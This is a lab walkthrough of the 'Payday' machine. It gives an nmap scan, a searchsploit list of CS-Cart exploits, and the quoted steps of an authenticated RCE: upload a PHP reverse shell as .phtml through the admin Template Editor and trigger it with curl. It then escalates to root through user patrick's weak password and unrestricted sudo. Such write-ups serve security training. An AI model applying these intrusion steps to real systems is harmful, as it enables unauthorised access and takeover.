Payday
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.157.39
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 13:42 +08
Nmap scan report for 192.168.157.39
Host is up (0.18s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3
CS-Cart -> RCE
Port 80 was running InternetShop CS-Cart, which looks really vulnerable:

There are loads of exploits for this:
$ searchsploit cs-cart
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection | php/webapps/40770.txt
----------------------------------------------------------- ---------------------------------
We can take a look at the authenticated RCE, since we can login using admin:admin
.
$ cat 48891.txt
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml -> Profit. ...!
We can then access admin.php
with the same credentials:

Head to 'Template Editor' and upload the file that we want.

Then, just run this:
$ curl http://192.168.157.39/skins/rev.phtml
And we would get a reverse shell:

Privilege Escalation
Weak Creds -> Root
We can su
to the user patrick
using the password patrick
. This user can run sudo
for everything:
patrick@payday:/home$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL

Last updated